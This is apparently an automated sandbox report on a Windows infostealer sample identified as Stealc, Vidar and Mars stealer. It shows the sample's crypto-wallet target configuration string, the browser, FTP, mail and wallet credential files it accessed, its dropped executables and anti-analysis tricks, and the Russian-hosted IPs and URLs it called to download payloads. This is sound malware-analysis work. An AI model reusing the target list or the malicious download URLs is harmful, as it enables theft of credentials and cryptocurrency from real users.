Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe, 00000000.00000002.1852046462.0000000001BBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 0000000B.00000002.1970868241.0000000001414000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1852046462.0000000001ABE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a37ec701f3.exe PID: 7344, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 11.2.a37ec701f3.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1850057063.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1969439309.0000000000121000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe PID: 7352, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1465915 Sample: SecuriteInfo.com.Win32.PWSX... Startdate: 02/07/2024 Architecture: WINDOWS Score: 100 60 Snort IDS alert for network traffic 2->60 62 Multi AV Scanner detection for domain / URL 2->62 64 Found malware configuration 2->64 66 16 other signatures 2->66 9 SecuriteInfo.com.Win32.PWSX-gen.20622.25663.exe 36 2->9         started        14 explorti.exe 2->14         started        16 explorti.exe 2->16         started        18 2 other processes 2->18 process3 dnsIp4 56 85.28.47.4, 63880, 63895, 80 GES-ASRU Russian Federation 9->56 58 77.91.77.81, 63881, 63894, 80 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 9->58 46 C:\Users\user\AppData\...\BGIIDAEBGC.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\softokn3[1].dll, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 9->50 dropped 52 11 other files (7 malicious) 9->52 dropped 92 Detected unpacking (changes PE section rights) 9->92 94 Tries to steal Mail credentials (via file / registry access) 9->94 96 Found many strings related to Crypto-Wallets (likely being stolen) 9->96 104 4 other signatures 9->104 20 cmd.exe 1 9->20         started        22 cmd.exe 2 9->22         started        98 Hides threads from debuggers 14->98 100 Tries to detect sandboxes / dynamic malware analysis system (registry check) 14->100 102 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 14->102 file5 signatures6 process7 process8 24 BGIIDAEBGC.exe 4 20->24         started        28 conhost.exe 20->28         started        30 conhost.exe 22->30         started        file9 44 C:\Users\user\AppData\Local\...\explorti.exe, PE32 24->44 dropped 84 Antivirus detection for dropped file 24->84 86 Detected unpacking (changes PE section rights) 24->86 88 Machine Learning detection for dropped file 24->88 90 5 other signatures 24->90 32 explorti.exe 16 24->32         started        signatures10 process11 dnsIp12 54 77.91.77.82, 63893, 63896, 63897 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU Russian Federation 32->54 40 C:\Users\user\AppData\...\a37ec701f3.exe, PE32 32->40 dropped 42 C:\Users\user\AppData\Local\...\random[1].exe, PE32 32->42 dropped 68 Antivirus detection for dropped file 32->68 70 Detected unpacking (changes PE section rights) 32->70 72 Tries to detect sandboxes and other dynamic analysis tools (window names) 32->72 74 5 other signatures 32->74 37 a37ec701f3.exe 12 32->37         started        file13 signatures14 process15 signatures16 76 Antivirus detection for dropped file 37->76 78 Multi AV Scanner detection for dropped file 37->78 80 Detected unpacking (changes PE section rights) 37->80 82 2 other signatures 37->82
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
77.91.77.81
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU false
85.28.47.4
 unknown Russian Federation
31643 GES-ASRU true
77.91.77.82
 unknown Russian Federation
42861 FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRU true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://77.91.77.81/mine/amadka.exe true
  • 27%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://77.91.77.82/Hun4Ko/index.php true
  • 24%, Virustotal, Browse
  • Avira URL Cloud: phishing
 unknown
http://85.28.47.4/69934896f997d5bb/softokn3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/mozglue.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/nss3.dll true
  • 9%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/vcruntime140.dll true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/freebl3.dll true
  • 6%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/920475a59bac849d.php true
  • 23%, Virustotal, Browse
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/sqlite3.dll true
  • Avira URL Cloud: malware
 unknown
http://85.28.47.4/69934896f997d5bb/msvcp140.dll true
  • Avira URL Cloud: malware
 unknown